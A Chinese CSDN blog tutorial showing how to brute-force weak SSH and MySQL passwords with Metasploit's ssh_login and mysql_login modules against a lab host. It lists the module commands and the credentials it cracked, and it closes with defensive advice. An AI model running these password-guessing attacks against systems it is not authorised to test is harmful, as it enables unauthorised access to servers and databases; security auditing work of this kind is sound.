linux mysql弱口令_[玩转Metasploit第二节]利用Metasploit审计Linux与Mysql弱口令

最新推荐文章于 2022-11-24 10:52:12 发布
最新推荐文章于 2022-11-24 10:52:12 发布
阅读量2.1k 收藏
点赞数
文章标签: linux mysql弱口令
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_29523195/article/details/113330348
版权

番外// x_al3r给了我版权并且让我写下去,

00x01

大致思路

|_____利用ssh_login模块

|_ _ _利用mysql_login模块

00x02

#所需准备

|_____Metasploit框架

|_ _ _Linux靶机一台

00x03

目标ip:192.168.1.127

目标系统:unix

##ssh_login

/*

启动metasploit框架:

msfconsole复制代码

*/

/*

搜索辅助模块---ssh_login

|___命令:

search ssh_login复制代码

|_ _ _得到exploit地址

auxiliary/scanner/ssh/ssh_login复制代码

8f3ff2fbfdd7c7c8339951a6542705fa.gif

1.png (349.28 KB, 下载次数: 38)

2016-9-5 14:01 上传

加载这个模块:

use auxiliary/scanner/ssh/ssh_login复制代码

查看所需要的选项:

show options复制代码

8f3ff2fbfdd7c7c8339951a6542705fa.gif

2.png (394.26 KB, 下载次数: 31)

2016-9-5 14:01 上传

只需要设置这三个参数即可

PASS_FILE  // 加载密码字典

RHOSTS    // 目标ip地址

USERNAME // 指定一个账户

开始设置

set PASS_FILE /root/pass.txt复制代码

set RHOSTS 192.168.1.127复制代码

set USERNAME msfadmin复制代码

file:///C:\Users\lenovo\AppData\Local\Temp\ksohtml\wps61BB.tmp.jpg

8f3ff2fbfdd7c7c8339951a6542705fa.gif

3.png (87.53 KB, 下载次数: 44)

2016-9-5 14:01 上传

设置完毕,我们输如

exploit复制代码开始进行审计

8f3ff2fbfdd7c7c8339951a6542705fa.gif

4.png (380.39 KB, 下载次数: 35)

2016-9-5 14:01 上传

得出密码:msfadmin

总结/**

1:工具简单实用,可以支持大批量检测

2:觉得速度偏慢可以设置线程数

*/

*/

#mysql_login

/*

我们先搜索mysql_login模块

命令:

search mysql_login复制代码

其实我们可以直接从上面的搜索结果中加载 //把ssh替换成mysql即可

Exploit地址:

auxiliary/scanner/mysql/mysql_login复制代码

8f3ff2fbfdd7c7c8339951a6542705fa.gif

5.png (187.53 KB, 下载次数: 34)

2016-9-5 14:01 上传

使用use命令加载模块

查看所需要的选项:

show options复制代码

8f3ff2fbfdd7c7c8339951a6542705fa.gif

6.png (386.88 KB, 下载次数: 33)

2016-9-5 14:01 上传

只需要设置这三个参数即可

PASS_FILE  // 加载密码字典

RHOSTS    // 目标ip地址

USERNAME // 指定一个账户

开始设置

set PASS_FILE /root/pass.txt复制代码

set RHOSTS 192.168.1.127复制代码

set USERNAME root复制代码

8f3ff2fbfdd7c7c8339951a6542705fa.gif

7.png (82.3 KB, 下载次数: 42)

2016-9-5 14:01 上传

设置完毕,使用

exploit复制代码进行审计mysql弱口令

8f3ff2fbfdd7c7c8339951a6542705fa.gif

8.png (468.47 KB, 下载次数: 36)

2016-9-5 14:01 上传

得出结果:root/root

/**

总结:工具简单实用,速度较快,也支持大批量审计

*/

*/

//防护建议:

1:使用强密码

2:敏感端口不支持外连如3306,1433,3389,22,23等端口

HN.K
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
3306 - 口令扫描工具
10-05
3306 - 口令扫描工具,口令,扫描工具,口令,扫描工具
msf 扫描mysql口令_Metasploit扫描Mysql口令
weixin_30954879的博客
02-04 179
msf > use auxiliary/scanner/mysql/mysql_loginmsf auxiliary(mysql_login) > set RHOSTS 5.5.5.3RHOSTS => 5.5.5.3msf auxiliary(mysql_login) > set USERNAME rootUSERNAME => rootmsf auxiliary(...
3306 mysql口令源码_Metasploit扫描Mysql口令
weixin_36313588的博客
01-26 556
msf > db_connect -y /opt/metasploit/apps/pro/ui/config/database.yml msf连接数据库[*] Rebuilding the module cache in the background...msf > db_status 查看数据库连接状态[*] postgresql connected to msf3msf &g...
Metasploit扫描Mysql口令
weixin_33672109的博客
09-01 603
msf > db_connect -y /opt/metasploit/apps/pro/ui/config/database.yml msf连接数据库[*] Rebuilding the module cache in the background...msf > db_status 查看数据库连接状态[*] postgresql connected to...
msf批量扫描ssh口令登录
Deeeelete的博客
02-05 2485
msfconsole search ssh_login搜索模块` use auxiliary/scanner/ssh/ssh_login使用第一个模块配置信息(分别设置密码,用户名,扫描的ip段): `msf5 > use auxiliary/scanner/ssh/ssh_login msf5 auxiliary(scanner/ssh/ssh_login) > set pas...
利用Metasploit进行Linux提权
01-09
Metasploit 拥有msfpayload 和msfencode 这两个工具,这两个工具不但可以生成exe 型后门,一可以生成网页脚本类型的webshell ,通过生成webshell 然后设置监听器,访问webshell的url,幸运的话可以产生一个session,...
Linux提权不能反弹Shell时利用metasploit进行提权.txt
03-18
Linux提权不能反弹Shell时利用metasploit进行提权.txt
MASTERING_METASPLOIT_THIRD_EDITION_metasploitframework_
10-02
2. **安装与配置**:详述如何在不同操作系统(如Windows、Linux、Mac OS X)上安装和配置Metasploit框架,以及如何进行基本的设置和更新。 3. **Metasploit工作原理**:解析Metasploit的架构,包括Exploit、Payload...
Metasploit with MYSQL in BackTrack 4 r2.txt
03-18
Metasploit with MYSQL in BackTrack 4 r2.txt
Metasploit初级系列课程
08-15
在这个“Metasploit初级系列课程”中,我们将深入探讨如何使用这款工具进行安全测试。 一、Metasploit框架基础 Metasploit框架由Ruby编程语言编写,主要包括四个核心组件:数据库、工作空间、模块和会话。...
口令超级扫描,可扫描3389,1433,22,21等端口并且爆破密码
04-23
口令超级扫描,可扫描3389,1433,22,21等端口并且爆破密码,效率快,准确率高 还支持C段,输入一个域名可以批量关联服务器,还能自动获取2级域名和旁站域名进行安全探测
基于Metasploit的网络安全评估系统
03-29
利用 Metasploit 框架作为评估系统的核心,通过对 Metasploit现有接口进行二次开发,集成当前较流行的安全工具,以模块化及插件式的方式,将系统有效划分为主机扫描、密码破解、漏洞扫描扫描、漏洞利用及生成报告等模块,最后将各个阶段智能化的关联起来,以一种“黑盒子”的方式向用户隐藏复杂的安全评估过程,最终通过漏洞报告展示评估结果。
第六课 使用Metasploit 各类密码破解(实战破解MySQL)
06-24
第六课 使用Metasploit 各类密码破解(实战破解MySQL)
使用 Metasploit 渗透局域网 Windows 设备
还没想好昵称的新建p的博客
12-01 993
本文讲述了如何使用 Metasploit 渗透局域网 Windows 设备。
B-3任务三:SSH口令渗透测试
m0_57032269的博客
05-13 1425
*任务说明:仅能获取Server3的IP地址 1.在渗透机Kali2.0中使用Zenmap工具扫描靶机场景所在网段(例如:172.16.101.0/24)范围内存活的主机IP地址和指定开放的21、22、23端口。并将该操作使用的命令中必须要添加的字符串作为Flag值提交(忽略ip地址); 命令:nmap -p21,22,23目标IP Flag:-p21,22,23 2.通过渗透机Kali2.0对靶机场景进行系统服务及版本扫描渗透测试,并将该操作显示结果中SSH服务对应的服务端口信...
mysql口令获取linxu权限_史上最全Linux提权后获取敏感信息方法
weixin_28843135的博客
02-08 210
在本文开始之前,我想指出我不是专家。据我所知,在这个庞大的区域,没有一个“神奇”的答案.分享,共享(我的出发点)。下面是一个混合的命令做同样的事情,在不同的地方,或只是一个不同的眼光来看待事物。我知道有更多的“东西”去寻找。这只是一个基本粗略的指南。并不是每一个命令,做好要注重细.文中的每行为一条命令,文中有的命令可能在你的主机上敲不出来,因为它可能是在其他版本的linux中所使用的命令。列举关...
Kali Linux渗透测试全程课与脚本语言编程系列课程
09-29
一、课程概要         本课程主要分享分享Kali Linux渗透测试全程课与脚本语言编程系列课程! 二、课程目标          本课程致力于帮助广大学员掌握Kali Linux渗透测试与编程技巧! 三、适合人员         本课程适合兴趣计算机与网络安全技术的学员观看学习! 四、特别提醒         本课程支持一次购买,享受永久观看,欢迎大家选购!
Kali系统MSF模块暴力破解MySQL口令漏洞
mooyuan的博客
11-24 8781
攻击环境使用KALI系统(使用虚拟机搭建)的Metasploit模块,msfconsole是metasploit中的一个工具,它集成了很多漏洞的利用的脚本,并且使用起来很简单的网络安全工具。这里要特别强调:被攻击的环境必须开启mysql远程登陆服务,通常MySQL开启的端口号是3306,故而一般情况下要求被攻击的服务器开启了3306端口号。
Metasploit-MSSQL渗透-实战篇
热门推荐
eT48_Sec
12-24 1万+
Kali Linux是基于Debian的Linux发行版, 设计用于数字取证和渗透测试。而Metasploit是Kali Linux中的一款开源安全漏洞检测工具。 打开metasploit的控制台终端: 先使用NMAP对目标进行端口扫描,目标的IP地址已经打码,不对外公开。 从扫描结果中,我们得知目标对外开放了1433端口对应于ms
Linux上用metasploit使用mysql_version模块怎么操作
最新发布
05-26
下面是在 Linux 上使用 Metasploitmysql_version 模块的步骤: 1. 打开终端并启动 Metasploit 控制台:`msfconsole` 2. 使用 search 命令查找 mysql_version 模块:`search mysql_version` 3. 选择 mysql_...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值